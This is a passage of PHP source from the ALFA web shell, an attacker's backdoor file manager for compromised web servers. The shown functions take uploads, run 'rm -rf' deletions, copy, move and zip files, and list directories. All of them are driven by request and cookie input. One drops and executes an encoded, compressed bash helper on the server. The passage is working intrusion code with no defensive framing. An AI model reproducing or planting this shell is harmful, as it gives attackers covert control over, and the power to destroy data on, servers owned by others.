value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="' . $base . '" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\'' . $base . '\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\'' . $base . '\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\'' . $base . '\', \'-\', this);return false;">-</button> | ';
    }
    function alfaFilesMan2()
    {
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4);
        echo "<div style=\"position:relative;\" fm_id=\"1\" id=\"filesman_holder_1\" class=\"ajaxarea filesman-active-content\"><div class=\"header\"></div></div>";
        alfaFooter();
    }
    function copy_paste($c, $s, $d)
    {
        if (@is_dir($c . $s)) {
            @mkdir($d . $s);
            $h = @opendir($c . $s);
            while (($f = @readdir($h)) !== false) {
                if ($f != "." and $f != "..") {
                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                }
            }
        } elseif (is_file($c . $s)) {
            @copy($c . $s, $d . $s);
        }
    }
    function alfaFilesMan()
    {
        if (!empty($_COOKIE['alfa_f'])) {
            $_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
        }
        if (!empty($_POST['alfa1'])) {
            switch ($_POST['alfa1']) {
                case 'uploadFile':
                    $move_cmd_file = false;
                    $alfa_canruncmd = false;
                    if ($GLOBALS['glob_chdir_false']) {
                        $alfa_canruncmd = _alfa_can_runCommand(true, true);
                        $move_cmd_file = true;
                    }
                    if (_alfa_is_writable($GLOBALS['cwd'])) {
                        $files = reArrayFiles($_FILES['f']);
                        $ret_files = array();
                        foreach ($files as $file) {
                            if ($move_cmd_file && $alfa_canruncmd) {
                                alfaEx("cat '" . addslashes($file['tmp_name']) . "' > '" . addslashes($_POST["c"] . "/" . $file['name']) . "'");
                            } else {
                                if (@move_uploaded_file($file['tmp_name'], $file['name'])) {
                                    $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($file['name'])) : array("name" => "????");
                                    $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($file['name'])) : array("name" => "????");
                                    $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($file['name']) : "????");
                                    $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($file['name']) : "????");
                                    $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
                                    $file_perm = alfaPermsColor($file['name']);
                                    $file_size = @filesize($file['name']);
                                    $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner . "/" . $file_group);
                                }
                            }
                        }
                        if (!$move_cmd_file) {
                            echo json_encode($ret_files);
                        }
                    } else {
                        echo "noperm";
                        return;
                    }
                    if (!$move_cmd_file) {
                        return;
                    }
                    break;
                case 'mkdir':
                    $new_dir_cmd = false;
                    if ($GLOBALS['glob_chdir_false']) {
                        if (_alfa_can_runCommand(true, true)) {
                            if (_alfa_is_writable($GLOBALS['cwd'])) {
                                if (!_alfa_is_dir(trim($_POST['alfa2']))) {
                                    alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';mkdir '" . trim(addslashes($_POST['alfa2'])) . "'");
                                    echo "<script>alfaShowNotification('" . addslashes($_POST['alfa2']) . " created...', 'Files manager');</script>";
                                } else {
                                    echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
                                }
                            } else {
                                echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
                            }
                        } else {
                            echo "<script>alfaShowNotification('Can\\'t create new dir !', 'Files manager', 'error');</script>";
                        }
                    } else {
                        if (_alfa_is_writable($GLOBALS['cwd'])) {
                            if (!_alfa_is_dir(trim($_POST['alfa2']))) {
                                if (!@mkdir(trim($_POST['alfa2']))) {
                                    echo "<script>alfaShowNotification('Can\\'t create new dir !', 'Files manager', 'error');</script>";
                                } else {
                                    echo "<script>alfaShowNotification('" . addslashes($_POST['alfa2']) . " created...', 'Files manager');</script>";
                                }
                            } else {
                                echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
                            }
                        } else {
                            echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
                        }
                    }
                    break;
                case 'delete':
                    function deleteDir($path)
                    {
                        $path = substr($path, -1) == '/' ? $path : $path . '/';
                        $dh = @opendir($path);
                        while (($item = @readdir($dh)) !== false) {
                            $item = $path . $item;
                            if (basename($item) == ".." || basename($item) == ".") {
                                continue;
                            }
                            $type = @filetype($item);
                            if ($type == "dir") {
                                deleteDir($item);
                            } else {
                                @unlink($item);
                            }
                        }
                        @closedir($dh);
                        @rmdir($path);
                    }
                    if (is_array(@$_POST['f'])) {
                        foreach ($_POST['f'] as $f) {
                            if ($f == '..') {
                                continue;
                            }
                            $f = rawurldecode($f);
                            if ($GLOBALS["glob_chdir_false"]) {
                                if (_alfa_can_runCommand(true, true)) {
                                    alfaEx("rm -rf '" . addslashes($_POST['c'] . '/' . $f) . "'");
                                }
                            } else {
                                alfaEx("rm -rf '" . addslashes($f) . "'", false, false);
                                if (@is_dir($f)) {
                                    deleteDir($f);
                                } else {
                                    @unlink($f);
                                }
                            }
                        }
                    }
                    if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..') {
                        deleteDir(rawurldecode(@$_POST['alfa2']));
                        alfaEx("rm -rf '" . addslashes($_POST['alfa2']) . "'", false, false);
                    } else {
                        @unlink(rawurldecode(@$_POST['alfa2']));
                    }
                    if ($GLOBALS["glob_chdir_false"]) {
                        $source = rawurldecode(@$_POST['alfa2']);
                        if ($source != '..' && !empty($source)) {
                            if (_alfa_can_runCommand(true, true)) {
                                alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';rm -rf '" . addslashes($source) . "'");
                            }
                        }
                    }
                    if (is_array($_POST['f'])) {
                        return;
                    }
                    break;
                case 'paste':
                    if ($_COOKIE['alfa_act'] == 'copy' && isset($_COOKIE['alfa_f'])) {
                        foreach ($_COOKIE['alfa_f'] as $f) {
                            copy_paste($_COOKIE['alfa_c'], $f, $GLOBALS['cwd']);
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'move' && isset($_COOKIE['alfa_f'])) {
                        function move_paste($c, $s, $d)
                        {
                            if (@is_dir($c . $s)) {
                                @mkdir($d . $s);
                                $h = @opendir($c . $s);
                                while (($f = @readdir($h)) !== false) {
                                    if ($f != "." and $f != "..") {
                                        copy_paste($c . $s . '/', $f, $d . $s . '/');
                                    }
                                }
                            } elseif (@is_file($c . $s)) {
                                @copy($c . $s, $d . $s);
                            }
                        }
                        foreach ($_COOKIE['alfa_f'] as $f) {
                            @rename($_COOKIE['alfa_c'] . $f, $GLOBALS['cwd'] . $f);
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'zip' && isset($_COOKIE['alfa_f'])) {
                        if (class_exists('ZipArchive')) {
                            $zip = new ZipArchive();
                            $zipX = "alfa_" . rand(1, 1000) . ".zip";
                            if ($zip->open($zipX, 1)) {
                                @chdir($_COOKIE['alfa_c']);
                                foreach ($_COOKIE['alfa_f'] as $f) {
                                    if ($f == '..') {
                                        continue;
                                    }
                                    if (@is_file($_COOKIE['alfa_c'] . $f)) {
                                        $zip->addFile($_COOKIE['alfa_c'] . $f, $f);
                                    } elseif (@is_dir($_COOKIE['alfa_c'] . $f)) {
                                        $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
                                        foreach ($iterator as $key => $value) {
                                            $key = str_replace('\\', '/', realpath($key));
                                            if (@is_dir($key)) {
                                                if (in_array(substr($key, strrpos($key, '/') + 1), array('.', '..'))) {
                                                    continue;
                                                }
                                            } else {
                                                $zip->addFile($key, $key);
                                            }
                                        }
                                    }
                                }
                                @chdir($GLOBALS['cwd']);
                                $zip->close();
                                __alert('>> ' . $zipX . ' << is created...');
                            }
                        }
                    } elseif ($_COOKIE['alfa_act'] == 'unzip' && isset($_COOKIE['alfa_f'])) {
                        if (class_exists('ZipArchive')) {
                            $zip = new ZipArchive();
                            foreach ($_COOKIE['alfa_f'] as $f) {
                                if ($zip->open($_COOKIE['alfa_c'] . $f)) {
                                    $zip->extractTo($_COOKIE['alfa_cwd']);
                                    $zip->close();
                                }
                            }
                        }
                    }
                    unset($_COOKIE['alfa_f']);
                    break;
                default:
                    if (!empty($_POST['alfa1'])) {
                        if (in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))) {
                            __alfa_set_cookie('alfa_act', @$_POST['alfa1']);
                            __alfa_set_cookie('alfa_f', @serialize($_POST['f']));
                            __alfa_set_cookie('alfa_c', @$_POST['c']);
                            return;
                        }
                    }
                    break;
            }
        }
        $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
        if (preg_match("#(.*)\\/\\.\\.#", $_POST['c'], $res)) {
            $path = explode('/', $res[1]);
            array_pop($path);
            $_POST['c'] = implode('/', $path);
        }
        $cmd_dir = false;
        if ($dirContent === false) {
            if (_alfa_can_runCommand(true, true)) {
                $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
                @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
                if (!isset($_COOKIE["alfachdir_bash"]) || @(!file_exists($tmp_getdir_path . "/alfacgiapi/getdir.alfa"))) {
                    $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
                    $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa", $bash);
                    __alfa_set_cookie("alfachdir_bash", "true");
                    __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
                }
                $dirContent = alfaEx("cd " . $tmp_getdir_path . "/alfacgiapi;sh getdir.alfa '" . addslashes(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']) . "'");
                $dirContent = json_decode($dirContent, true);
                if (is_array($dirContent)) {
                    array_pop($dirContent);
                    $cmd_dir = true;
                } else {
                    $dirContent = false;
                }
            }
        }
        alfahead();
        AlfaNum(8, 9, 10, 7, 6, 5, 4);
        $count_dirContent = @count($dirContent);
        if ($count_dirContent > 300) {
            @($_COOKIE["alfa_limited_files"] = 100);
        }
        $alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
        $alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int) $_COOKIE["alfa_limited_files"] : 0;
        $alfa_files_page_number = isset($_POST["pagenum"]) ? (int) $_POST["pagenum"] : 1;
        $alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
        $files_page_count = 1;
        if ($alfa_limited_files > 0) {
            $files_page_count = ceil($count_dirContent / $alfa_limited_files);
            if ($files_page_count > 1) {
                $files_page_count++;
            }
        }
        echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" ' . ($alfa_sort_by == 'name' ? 'selected' : '') . '>Name</option><option value="size" ' . ($alfa_sort_by == 'size' ? 'selected' : '') . '>Size</option><option value="modify" ' . ($alfa_sort_by == 'modify' ? 'selected' : '') . '>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" ' . ($alfa_filesman_direction == 'asc' ? 'selected' : '') . '>Ascending</option><option value="desc" ' . ($alfa_filesman_direction == 'desc' ? 'selected' : '') . '>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="' . $alfa_limited_files . '" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">' . ($count_dirContent - 1) . '</b></span></div><div class="header">';
        if ($dirContent == false) {
            echo "<center><br><span style=\"font-size:16px;\"><span style=\"color: red; -webkit-text-shadow: 1px 1px 13px;\"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>";
            alfaFooter();
            return;
        }
        global $sort;
        $sort = array('name', 1);
        if (isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])) {
            $sort[0] = $_COOKIE["alfa_sort_by"];
        }
        if (!empty($_POST['alfa1'])) {
            if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['alfa1'], $match)) {
                $sort = array($match[1], (int) $match[2]);
            }
        }
        if ($alfa_files_page_number > $files_page_count - 1) {
            $alfa_files_page_number = 1;
        }
        $checkbox_rand = rand(11111, 99999);
        echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk" . $checkbox_rand . "' onclick='checkBox(this);' class='chkbx'><label for='mchk" . $checkbox_rand . "'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
        $dirs = $files = array();
        $n = $count_dirContent;
        if ($n > $alfa_limited_files && $alfa_limited_files > 0) {
            $n = $alfa_limited_files * $alfa_files_page_number;
            if ($n > $count_dirContent) {
                $n = $count_dirContent;
            }
        }
        $i = 0;
        if ($alfa_limited_files > 0 && $alfa_files_page_number > 1) {
            $i = $alfa_limited_files * ($alfa_files_page_number - 1);
        }
        $page_builder = get_pagination_links($alfa_files_page_number, $files_page_count - 1);
        $cmd_dir_backp = "";
        for (; $i < $n; $i++) {
            if ($cmd_dir) {
                $filename = $dirContent[$i]["name"];
                $file_owner = $dirContent[$i]["owner"];
                $file_group = $dirContent[$i]["group"];
                $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
                $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"], "num" => $dirContent[$i]["permnum"], "human" => $dirContent[$i]["permhuman"]), true);
                $file_size = $dirContent[$i]["size"];
                if (substr($dirContent[$i]["name"], 0, 1) == "/") {
                    $file_path = $dirContent[$i]["name"];
                    $dirContent[$i]["name"] = "..";
                    $filename = $dirContent[$i]["name"];
                } else {
                    $file_path = $GLOBALS['cwd'] . "/" . $dirContent[$i]["name"];
                }
            } else {
                $filename = $dirContent[$i];
                $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS['cwd'] . $filename)) : array("name" => "????");
                $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS['cwd'] . $filename)) : array("name" => "????");
                $file_owner = $ow['name'] ? $ow['name'] : (function_exists("fileowner") ? @fileowner($GLOBALS['cwd'] . $filename) : "????");
                $file_group = $gr['name'] ? $gr['name'] : (function_exists("filegroup") ? @filegroup($GLOBALS['cwd'] . $filename) : "????");
                $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
                $file_perm = alfaPermsColor($GLOBALS['cwd'] . $filename);
                $file_size = @filesize($GLOBALS['cwd'] . $filename);
                $file_path = $GLOBALS['cwd'] . $filename;
            }
            $tmp = array('name' => $filename, 'path' => $file_path, 'modify' => $file_modify, 'perms' => $file_perm, 'size' => $file_size, 'owner' => $file_owner, 'group' => $file_group);
            if ($filename == ".." && !$cmd_dir) {
                $tmp["path"] = str_replace("\\", "/", realpath($file_path));
            }
            if (!$cmd_dir) {
                if (@is_file($file_path)) {
                    $arr_mrg = array('type' => 'file');
                    if (@is_link($file_path)) {
                        $arr_mrg["link"] = readlink($tmp['path']);
                    }
                    $files[] = array_merge($tmp, $arr_mrg);
                } elseif (@is_link($file_path)) {
                    $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
                } elseif (@is_dir($file_path) && $filename != ".") {
                    $dirs[] = array_merge($tmp, array('type' => 'dir'));
                }
            } else {
                if ($dirContent[$i]["type"] == "file") {
                    $files[] = array_merge($tmp, array('type' => 'file'));
                } else {
                    if ($dirContent[$i]["name"] != ".") {
                        $dirs[] = array_merge($tmp, array('type' => 'dir'));
                    }
                }
            }
        }
        $GLOBALS['sort'] = $sort;
        function alfaCmp($a, $b)
        {
            if ($GLOBALS['sort'][0] != 'size') {
                return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
            } else {
                return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
            }
        }
        usort($files, "alfaCmp");
        usort($dirs, "alfaCmp");
        if (isset($_COOKIE["alfa_filesman_direction"]) && !empty($_COOKIE["alfa_filesman_direction"])) {
            if ($_COOKIE["alfa_filesman_direction"] == 'desc') {
                $files = array_reverse($files);
                $dirs = array_reverse($dirs);
            }
        }
        $files = array_merge($dirs, $files);
        $l = 0;
        $cc = 0;
        foreach ($files as $f) {
            $f['name'] = htmlspecialchars($f['name']);
            $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8') . '...' : $f['name'];
            $checkbox = 'checkbox_' . $checkbox_rand . $cc;
            $raw_name = rawurlencode($f['name']);
            $icon = $GLOBALS['DB_NAME']['show_icons'] ? '<img src="' . findicon($f['name'], $f['type']) . '" width="30" height="30">' : '';
            $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';
            echo '<tr class="fmanager-row" id="tr_row_' . $cc . '"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="' . $raw_name . '" class="chkbx" id="' . $checkbox . '"><label for="' . $checkbox . '"></label></div></td><td id="td_row_' . $cc . '">' . $icon . '<div style="' . $style . '"><a row="' . $cc . '" id="id_' . $cc . '" class="main_name" onclick="' . ($f['type'] == 'file' ? 'editor(\'' . $raw_name . '\',\'auto\',\'\',\'\',\'\',\'' . $f['type'] . '\');" href="#action=fileman&path=' . $GLOBALS['cwd'] . '&file=' . $raw_name . '" fname="' . $raw_name . '" ftype="file" path="' . $GLOBALS['cwd'] . '" opt_title="' . $f['link'] . '" ' . (isset($f['link']) ? 'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"' : '') . '>' . ($GLOBALS['cwd'] . $f['name'] == $GLOBALS['__file_path'] ? "<span class='shell_name' style='font-weight:unset;'>" . $f['name'] . "</span>" : htmlspecialchars($newname)) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" href="#action=fileman&path=' . $f['path'] . '" fname="' . $raw_name . '" ftype="folder" path="' . $GLOBALS['cwd'] . '" opt_title="' . $f['link'] . '" ' . (isset($f['link']) ? 'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"' : '') . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td></div><td><span style="font-weight:unset;" class="main_size">' . ($f['type'] == 'file' ? (isset($f['link']) ? '[L] ' : '') . alfaSize($f['size']) : $f['type']) . '</span></td><td><span style="font-weight:unset;" class="main_modify">' . $f['modify'] . '</span></td><td><span style="font-weight:unset;" class="main_owner_group">' . $f['owner'] . '/' . $f['group'] . '</span></td><td><a id="id_chmode_' . $cc . '" href=javascript:void(0) onclick="editor(\'' . $raw_name . '\',\'chmod\',\'\',\'\',\'\',\'' . $f['type'] . '\')">' . $f['perms'] . '</td><td><a id="id_rename_' . $cc . '" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'rename\',\'\',\'\',\'\',\'' . $f['type'] . '\')">R</a> <a id="id_touch_' . $cc . '" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'touch\',\'\',\'\',\'\',\'' . $f['type'] . '\')">T</a>' . ($f['type'] == 'file' ? ' <a id="id_edit_' . $cc . '" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'edit\',\'\',\'\',\'\',\'' . $f['type'] . '\')">E</a> <a id="id_download_' . $cc . '" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $raw_name . '\', \'download\')">D</a>' : '') . '<a id="id_delete_' . $cc . '" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # ' . addslashes(rawurldecode($f['name'])) . ' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'' . $raw_name . '\') : \'\';"> X </a></td></tr>';
            $l = $l ? 0 : 1;
            $cc++;
        }
        echo "<tr id='filemanager_last_tr'><td colspan=7>\r\n<input type=hidden name=a value='FilesMan'>\r\n<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['glob_chdir_false'] ? $_POST['c'] : $GLOBALS['cwd']) . "'>\r\n<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>\r\n<input type='submit' value=' '>\r\n</form></table><div class='pages-holder'><div class='pages-number'>" . $page_builder . "</div></div></div></div>";
        alfafooter();
    }
    function get_pagination_links($current_page, $total_pages)
    {
        $links = "";
        if ($total_pages >= 1 && $current_page <= $total_pages) {
            $links = "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
            $selected_page = "";
            if ($current_page == 1) {
                $selected_page = " active-page-number";
            }
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">1</a>";
            $i = max(2, $current_page - 5);
            if ($i > 2) {
                $links .= "<a class=\"page-number\">...</a>";
            }
            for (; $i < min($current_page + 6, $total_pages); $i++) {
                if ($i == $current_page) {
                    $selected_page = " active-page-number";
                } else {
                    $selected_page = "";
                }
                $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">{$i}</a>";
            }
            if ($i != $total_pages) {
                $links .= "<a class=\"page-number\">...</a>";
            }
            $selected_page = " last-page-number";
            if ($current_page == $total_pages) {
                $selected_page = " last-page-number active-page-number";
            }
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number" . $selected_page . "\">{$total_pages}</a>";
            $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
        }
        return $links;
    }
    function alfaFilesTools()
    {
        alfahead();
        echo "<div class=\"filestools\" style=\"height: 100%;\">";
        if (isset($_POST['alfa1'])) {
            $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
        }
        $alfa1_decoded = $_POST['alfa1'];
        $chdir_fals = false;
        if (!@chdir($_POST['c'])) {
            $chdir_fals = true;
            $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
            if ($alfa_canruncmd) {
                $slashed_alfa1 = addslashes($_POST['alfa1']);
                $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "' . $slashed_alfa1 . '"'));
                $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");
            }
        }
        if ($_POST['alfa2'] == 'auto') {
            if (is_array(@getimagesize($_POST['alfa1']))) {
                $_POST['alfa2'] = 'image';
            } else {
                $_POST['alfa2'] = 'view';
                if ($chdir_fals) {
                    if ($alfa_canruncmd) {
                        $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST['alfa1']) . "'"));
                        $mimetype = $mime[1];
                        if (!empty($mimetype)) {
                            if (strstr($mimetype, "image")) {
                                $_POST['alfa2'] = 'image';
                            }
                        }
                    }
                }
            }
        }
        if ($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])) {
            $rename_cache = $_POST['alfa3'];
        }
        if (@$_POST['alfa2'] == 'mkfile') {
            $_POST['alfa1'] = trim($_POST['alfa1']);
            if ($chdir_fals && $alfa_canruncmd) {
                if (_alfa_is_writable($_POST["c"])) {
                    alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'");
                    $_POST['alfa2'] = "edit";
                }
            }
            if (!@file_exists($_POST['alfa1'])) {
                $fp = @fopen($_POST['alfa1'], 'w');
                if ($fp) {
                    $_POST['alfa2'] = "edit";
                    fclose($fp);
                }
            } else {
                $_POST['alfa2'] = "edit";
            }
        }
        if (!_alfa_file_exists(@$_POST['alfa1'])) {
            echo __pre() . "<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST['alfa4'] . "');</script>";
            alfaFooter();
            return;
        }
        if ($chdir_fals) {
            $filesize = $file_info[3];
            $uid["name"] = $file_info[1];
            $gid["name"] = $file_info[2];
            $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true);
        } else {
            $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
            $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
            if (!$uid && !$gid) {
                $uid['name'] = function_exists("fileowner") ? @fileowner($_POST['alfa1']) : '';
                $gid['name'] = function_exists("filegroup") ? @filegroup($_POST['alfa1']) : '';
            }
            $permcolor = alfaPermsColor($_POST['alfa1']);
            $filesize = @filesize($_POST['alfa1']);
            if (!isset($uid['name'], $gid['name']) || empty($uid['name']) || empty($gid['name'])) {
                if (_alfa_can_runCommand()) {
                    list($uid['name'], $gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "' . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . '"'));
                }
            }
        }
        if (substr($_POST['alfa1'], 0, 7) == "phar://") {
            $alfa_file_directory = $_POST['alfa1'];
        } else {
            $alfa_file_directory = str_replace("//", "/", ($chdir_fals ? "" : $_POST['c'] . '/') . $_POST['alfa1']);
        }
        echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> ' . htmlspecialchars(basename($alfa1_decoded)) . ' <span class="editor_file_info_vars">Size:</span> ' . alfaSize($filesize) . ' <span class="editor_file_info_vars">Permission:</span> ' . $permcolor . ' <span class="editor_file_info_vars">Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . ' <span class="editor_file_info_vars">Directory:</span> ' . dirname($alfa_file_directory) . '</div>';
        if (empty($_POST['alfa2'])) {
            $_POST['alfa2'] = 'view';
        }
        if (!_alfa_is_dir($_POST['alfa1'])) {
            $m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
            $ftype = "file";
        } else {
            $m = array('Chmod', 'Rename', 'Touch');
            $ftype = "dir";
        }
        echo "<div>";
        foreach ($m as $v) {
